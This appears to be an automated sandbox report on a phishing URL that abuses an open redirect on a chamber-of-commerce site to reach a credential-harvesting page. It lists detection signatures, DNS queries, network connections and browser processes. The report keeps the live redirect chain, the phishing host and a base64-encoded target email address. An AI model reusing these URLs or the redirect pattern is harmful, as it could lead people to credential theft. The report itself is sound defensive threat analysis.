Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=

Overview

General Information

Sample URL:https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc2
Analysis ID:1431646

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
HTML page contains suspicious base64 encoded javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc= MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1984,i,13109837992578374964,256462902834488272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
3.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 3.4.pages.csv, type: HTML
    Source: https://efe.q39r.com/efe/#Xzzfdoml_supervisor1st_assistant@fd.orgHTTP Parser: Base64 decoded: <script>
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: Number of links: 0
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://efe.q39r.com/efe/#Xzzfdoml_supervisor1st_assistant@fd.orgHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: Title: JaSvlHztEc does not match URL
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: Invalid link: Terms of use
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: Invalid link: Privacy & cookies
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: Invalid link: Terms of use
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: Invalid link: Privacy & cookies
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: <input type="password" .../> found
    Source: https://efe.q39r.com/efe/#Xzzfdoml_supervisor1st_assistant@fd.orgHTTP Parser: No favicon
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50elk/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalHTTP Parser: No favicon
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50elk/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalHTTP Parser: No favicon
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: No favicon
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: No favicon
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: No <meta name="author".. found
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: No <meta name="author".. found
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: No <meta name="copyright".. found
    Source: https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCYHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49783 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
    Source: global trafficDNS traffic detected: DNS query: web.lehighvalleychamber.org
    Source: global trafficDNS traffic detected: DNS query: sanemedia.ca
    Source: global trafficDNS traffic detected: DNS query: efe.q39r.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: ipapi.co
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49783 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.win@18/39@34/225
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1984,i,13109837992578374964,256462902834488272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1984,i,13109837992578374964,256462902834488272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
